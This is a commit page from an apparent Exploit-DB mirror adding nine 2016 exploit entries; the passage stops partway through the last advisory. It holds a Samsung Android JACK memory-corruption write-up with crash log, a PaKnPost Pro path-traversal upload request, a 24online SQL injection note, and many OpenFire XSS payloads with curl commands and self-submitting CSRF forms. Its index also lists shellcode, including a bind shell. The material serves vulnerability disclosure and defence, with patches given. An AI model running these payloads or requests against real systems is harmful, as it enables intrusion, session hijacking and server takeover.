bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-07-07

Browse source 
9 new exploits

CIMA DocuClass ECM - Multiple Vulnerabilities
24online SMS_2500i 8.3.6 build 9.0 - SQL Injection
Linux 64bit Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) - 176 bytes
Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities
PaKnPost Pro 1.14 - Multiple Vulnerabilities
GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution
OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities
Samsung Android JACK - Privilege Escalation
Nagios XI Chained Remote Code Execution
This commit is contained in:
Offensive Security 2016-07-07 05:06:28 +00:00
parent 49a443eece
commit 52cf6a3185
11 changed files with 2049 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -36058,6 +36058,7 @@ id,file,description,date,author,platform,type,port
39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80
40059,platforms/php/webapps/40059.txt,"CIMA DocuClass ECM - Multiple Vulnerabilities",2016-07-06,"Karn Ganeshen",php,webapps,80
39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
@ -36229,3 +36230,11 @@ id,file,description,date,author,platform,type,port
40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0
40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80
40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80
40061,platforms/lin_x86-64/shellcode/40061.c,"Linux 64bit Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) - 176 bytes",2016-07-06,CripSlick,lin_x86-64,shellcode,0
40062,platforms/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic, Grega Preseren",cgi,webapps,80
40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80

Can't render this file because it is too large.

230
platforms/android/local/40066.txt Executable file
View file

@ -0,0 +1,230 @@
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=796
https://bugs.chromium.org/p/project-zero/issues/detail?id=795
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The shared memory implementation (implemented by com.samsung.android.IAndroidShm
system service) allows any application to access/modify/map shared memory pages
used by JACK, regardless of which application created those shared memory pages.
(NB: This possibly results in breaking the Android permissions model and
permitting applications without the required capability to access microphone
input; this was not investigated further.)
There are multiple possible ways to corrupt the internal state of any of the
shared-memory backed c++ objects in use; attached is a PoC that uses the shared
memory service to map the JackEngineControl object in use, and modify the value
of the fDriverNum member, which is used in several places without validation.
This is highly likely not the only variable stored in shared memory that is used
without proper validation; and the function shown below is definitely not the
only place that this particular variable is used dangerously. To secure this
interface it will be necessary to review all uses of variables stored in these
shared memory interfaces.
/*!
\brief Engine control in shared memory.
*/
PRE_PACKED_STRUCTURE
struct SERVER_EXPORT JackEngineControl : public JackShmMem
{
// Shared state
jack_nframes_t fBufferSize;
jack_nframes_t fSampleRate;
bool fSyncMode;
bool fTemporary;
jack_time_t fPeriodUsecs;
jack_time_t fTimeOutUsecs;
float fMaxDelayedUsecs;
float fXrunDelayedUsecs;
bool fTimeOut;
bool fRealTime;
bool fSavedRealTime; // RT state saved and restored during Freewheel mode
int fServerPriority;
int fClientPriority;
int fMaxClientPriority;
char fServerName[JACK_SERVER_NAME_SIZE+1];
JackTransportEngine fTransport;
jack_timer_type_t fClockSource;
int fDriverNum;
bool fVerbose;
// CPU Load
jack_time_t fPrevCycleTime;
jack_time_t fCurCycleTime;
jack_time_t fSpareUsecs;
jack_time_t fMaxUsecs;
jack_time_t fRollingClientUsecs[JACK_ENGINE_ROLLING_COUNT];
unsigned int fRollingClientUsecsCnt;
int fRollingClientUsecsIndex;
int fRollingInterval;
float fCPULoad;
// For OSX thread
UInt64 fPeriod;
UInt64 fComputation;
UInt64 fConstraint;
// Timer
JackFrameTimer fFrameTimer;
#ifdef JACK_MONITOR
JackEngineProfiling fProfiler;
#endif
...
This is quite a convenient exploitation primitive, as a small negative value
will cause the code in several places to index backwards from a known array;
when (any of the similar functions to the below are called, table is pointing
to the fClientTable array inside a JackEngine instance)
void JackTransportEngine::MakeAllLocating(JackClientInterface** table)
{
for (int i = GetEngineControl()->fDriverNum; i < CLIENT_NUM; i++) {
JackClientInterface* client = table[i];
if (client) {
JackClientControl* control = client->GetClientControl();
control->fTransportState = JackTransportStopped;
control->fTransportSync = true;
control->fTransportTimebase = true;
jack_log("MakeAllLocating ref = %ld", i);
}
}
}
class SERVER_EXPORT JackEngine : public JackLockAble
{
friend class JackLockedEngine;
private:
JackGraphManager* fGraphManager;
JackEngineControl* fEngineControl;
char fSelfConnectMode;
JackClientInterface* fClientTable[CLIENT_NUM];
We can see that just behind the fClientTable, we have two pointers to other
objects; a JackEngineControl and a JackGraphManager, both of which are backed by
shared memory. Since we are treating the pointer read from table as a c++ object
with a vtable pointer, this lets us trivially gain control of the flow of
execution.
Fatal signal 11 (SIGSEGV), code 1, fault addr 0x41414140 in tid 27197 (jackd)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD:user/release-keys'
Revision: '10'
ABI: 'arm'
pid: 27181, tid: 27197, name: jackd >>> /system/bin/jackd <<<
AM write failed: Broken pipe
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414140
r0 f3f1a000 r1 f48c2010 r2 f48c2010 r3 41414141
r4 f3f1a000 r5 00000036 r6 f3dbf930 r7 00000078
r8 f72c8b9c r9 f6f1a308 sl f3d3f000 fp f719a991
ip f71d7a0c sp f3dbf7d8 lr f7196c43 pc 41414140 cpsr 800f0030
backtrace:
#00 pc 41414140 <unknown>
#01 pc 0003cc41 /system/lib/libjackserver.so (Jack::JackTransportEngine::MakeAllLocating(Jack::JackClientInterface**)+52)
#02 pc 0003cda1 /system/lib/libjackserver.so (Jack::JackTransportEngine::CycleEnd(Jack::JackClientInterface**, unsigned int, unsigned int)+228)
#03 pc 00048bd5 /system/lib/libjackserver.so
#04 pc 00049211 /system/lib/libjackserver.so (Jack::JackEngine::Process(unsigned long long, unsigned long long)+228)
#05 pc 000442fd /system/lib/libjackserver.so
#06 pc 00044f49 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSyncMaster()+40)
#07 pc 00044f0d /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSync()+20)
#08 pc 00044e87 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessSync()+94)
#09 pc 00044bbf /system/lib/libjackserver.so (Jack::JackAudioDriver::Process()+22)
#10 pc 0004fff1 /system/lib/libjackserver.so (Jack::JackThreadedDriver::Process()+24)
#11 pc 0005051f /system/lib/libjackserver.so (Jack::JackThreadedDriver::Execute()+18)
#12 pc 00040a0f /system/lib/libjackserver.so (Jack::JackAndroidThread::ThreadHandler(void*)+126)
#13 pc 0003fc53 /system/lib/libc.so (__pthread_start(void*)+30)
#14 pc 0001a38b /system/lib/libc.so (__start_thread+6)
Tombstone written to: /data/tombstones/tombstone_05
################################################################################################################
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The JACK shared memory implementation uses the struct jack_shm_info_t defined in
/common/shm.h to do some bookkeeping
PRE_PACKED_STRUCTURE
struct _jack_shm_info {
jack_shm_registry_index_t index; /* offset into the registry */
uint32_t size;
#ifdef __ANDROID__
jack_shm_fd_t fd;
#endif
union {
void *attached_at; /* address where attached */
char ptr_size[8];
} ptr; /* a "pointer" that has the same 8 bytes size when compling in 32 or 64 bits */
} POST_PACKED_STRUCTURE;
typedef struct _jack_shm_info jack_shm_info_t;
This struct is stored at the start of every JackShmAble object.
/*!
\brief
A class which objects possibly want to be allocated in shared memory derives from this class.
*/
class JackShmMemAble
{
protected:
jack_shm_info_t fInfo;
public:
void Init();
int GetShmIndex()
{
return fInfo.index;
}
char* GetShmAddress()
{
return (char*)fInfo.ptr.attached_at;
}
void LockMemory()
{
LockMemoryImp(this, fInfo.size);
}
void UnlockMemory()
{
UnlockMemoryImp(this, fInfo.size);
}
};
This means that whenever the JACK server creates an object backed by shared
memory, it also stores a pointer to that object (in the address space of the
JACK server), allowing a malicious client to bypass ASLR in the JACK server
process.
The PoC provided for the other reported JACK issue uses this to bypass ASLR in
the JACK server process.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40066.zip

91
platforms/cgi/webapps/40063.txt Executable file
View file

@ -0,0 +1,91 @@
# Exploit Title: PaKnPost Pro Arbitrary File Upload & Remote Code Execution
# Date: 2016-07-06
# Product: PaKnPost Pro
# Vendor Homepage: http://www.paknpost.org
# Software Link: https://sourceforge.net/projects/paknpost/
# Version: <=1.14
# Tested on: Windows, Linux
# Exploit Authors: Edvin Rustemagic, Grega Preseren
# Contacts: https://www.linkedin.com/in/edvinrustemagic - https://si.linkedin.com/in/gregapreseren
===========
Description
===========
File extension check bypass and directory traversal lead to uploading an arbitrary file to an unintended directory and remote code execution.
=======
Details
=======
File extension check can be bypassed by using two extensions, out of which one must be allowed (select_.cgi:368).
Directory traversal vulnerability exists in the GET parameter sid, where no validation checks are made (select_.cgi:204).
Exploitation of these two vulnerabilities allows an attacker to upload a webshell to an executable directory and gain command line access to the server. Windows deployments turned out to be more likely exploitable with a consequence of gaining SYSTEM privileges.
========
Timeline
========
2016-03-15 Vulnerability discovered at customer's deployment.
2016-06-13 PoC completed for Linux and Windows platforms.
2016-06-13 Author/Maintainer at SourceForge has been notified.
2016-06-21 Patch written and delivered to Author/Maintainer.
2016-06-23 Patch publicly released.
2016-07-06 Exploit submitted to Exploit-DB.
=======================
Windows PoC Environment
=======================
- Windows Server 2003 R2 SP2
- Apache 2.2.10
- ActivePerl 5.8.0.806
=====================
Linux PoC Environment
=====================
- Debian 8.3
- Apache 2.4.10
- Perl 5.20.2
=======
Exploit
=======
1. File upload GET parameter 'sid' can be exploited in order to upload an arbitrary file to an unintended executable directory.
2. File upload multipart POST parameter 'filename' can include two extensions to bypass file extension check.
For example:
POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/1.1
Host: paknpost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://paknpost/cgi-bin/pnp/select.cgi
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------6077763223847
Content-Length: 6087
-----------------------------6077763223847
Content-Disposition: form-data; name="file[1]"; filename="pnp-test.txt.cgi"
Content-Type: application/octet-stream
==============
Solution/Patch
==============
a. Update to version 1.15
b. Or apply the following patch:
--- select_.cgi.ORIG 2016-03-29 22:56:40.868000000 +0200
+++ select_.cgi 2016-06-14 10:18:37.864000000 +0200
@@ -201,6 +201,9 @@
}
# Create the new Holding Area
+if ($sessionid =~ m/[^\w]/) {
+ &error(file_write);
+}
$user_dir = $upload_dir.$sessionid;
if (-d "$user_dir")
{
@@ -365,7 +368,7 @@
if ($file_check)
{
# Exclude all except acceptable file extensions as a fist cut to file checks
- unless (grep($fhl =~ /$_/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
+ unless (grep($fhl =~ /$_$/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
$debug1 = "Passed";

22
platforms/jsp/webapps/40060.txt Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: SQL Injection In 24 Online Billing API
# Date: 03/07/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://24onlinebilling.com
# Software Name:24online Model SMS_2500i
# Version: 8.3.6 build 9.0
# Tested on: Ubuntu Linux
Potentially others versions older than this are vulnerable too.
Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection
Authentication Required: Yes
A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss
There is complete informational disclosure over the stored database.
I tried to contact them to disclose and get the vulnerability patched, but they did not reply positively.

681
platforms/jsp/webapps/40065.txt Executable file
View file

@ -0,0 +1,681 @@
# Several vulnerabilities doscovered in OpenFire version 3.10.2 to 4.0.1
## Product Description
**OpenFire** is an opensource project under GNU GPL licence. It provides a Jabber/XMPP server fully develloped in Java. It's develloped by the **Ignite realtime** community.
The actual version of the product is 4.0.2.
Official web site : http://igniterealtime.org/
Several vulnerabilities have been discovered between 2015, October and 2016, February.
Reported vulnerabilities are similar to those previously discovered by hyp3rlinx, although they concern different pages.
In brief, the flaws are of the following kinds: CSRF, XSS (reflected and stored), file upload and information disclosure. Most vulnerabilities need an administration access to the web application and may lead to personal information leakage or account take-over.
**Ingnite realtime** fixed some vulnerabilities (the corresponding commit ID are indicated in this document).
## Several Relected XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS may lead to session hijacking on admin user.
### Proof of Concept
#### *domain* and *remotePort* variables from *server2server-settings.jsp*
The following POST values can be sent to trigger the vulnerability:
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server
```
or
```
domain=testt&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server
```
or
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server
```
You can reproduce the exploitation with the following curl commands:
```
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=test&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from *plugins/search/advance-user-search.jsp*
The following GET request exploits the XSS vulnerability:
```
http://OpenFireServerIP:9090/[[http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
## Several stored XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/muc-service-edit-form.jsp" >
<input type="text" name="save" value="true" >
<input type="text" name="mucname" value="test" >
<input type="text" name="mucdesc" value="%22/><script>alert('XSS')</script>" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl "http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp" --data="searchEnabled=true&searchname=%22/%3E%3Cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false" --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *page plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false" https://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *serverName* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-props.jsp" method="post" target="xss-frame" >
<input type="text" name="serverName" value="localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" >
<input type="text" name="serverPort" value="5269" >
<input type="text" name="componentPort" value="5275" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="true" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="embeddedPort" value="9090" >
<input type="text" name="embeddedSecurePort" value="9091" >
<input type="text" name="jmxEnabled" value="false" >
<input type="text" name="jmxSecure" value="true" >
<input type="text" name="jmxPort" value="1099" >
<input type="text" name="save" value="Save+Properties" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties" https://OpenFireServerIP:9090/server-props.jsp --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several Relected XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS could lead to session hijacking against an administrator.
Some of these vulnerabilities have already been found by hyp3rlinx, but had not been patched properly.
### Proof of Concept
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from *page create-bookmark.jsp* suffer from the vulnerability
The following POST values can be sent to trigger the vulnerability:
```
groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS1%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat
```
The following curl command allows reproducing the attack against the Openfire *plugins/bookmarks/create-bookmark.jsp* page:
```
curl --data "save=true&mucname=conference&mucdesc=Public+Chatrooms%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *search* variable from *group-summary.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22
```
The following curl command allows reproducing the attack against the Openfire *group-summary.jsp* page.
```
curl http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 --cookie="JSESSIONID=XXX"
```
#### *maxTotalSize*, *maxFileSize*, *maxDays*, *logTimeout* variables from *audit-policy.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings
```
The following curl command allows reproducing the attack against the Openfire *audit-policy.jsp* page:
```
curl "http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings" --cookie="JSESSIONID=XXX"
```
#### *passPhrase* variables from *import-keystore-certificate.jsp*
The following POST values exploit the XSS vulnerability:
```
passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save
```
The following curl command allows reproducing the attack against the Openfire *import-keystore-certificate.jsp* page.
```
curl http://OpenFireServerIP:9090/import-keystore-certificate.jsp --data="passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save" --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from */plugins/search/advance-user-search.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* admin page.
```
curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Several stored XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
Some of these vulnerabilities have already been found by hyp3rlinx, but has not been patched since.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
#### *subdomain* variable from *connection-settings-external-components.jsp*
The following curl command allows reproducing the attack against the Openfire *connection-settings-external-components.jsp* page:
```
curl --data "subdomain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&secret=toto&componentAllowed=Add+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
Or
```
curl --data "subdomain=%22%3Escript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&componentBlocked=Block+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from page muc-service-edit-form.jsp
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* page:
```
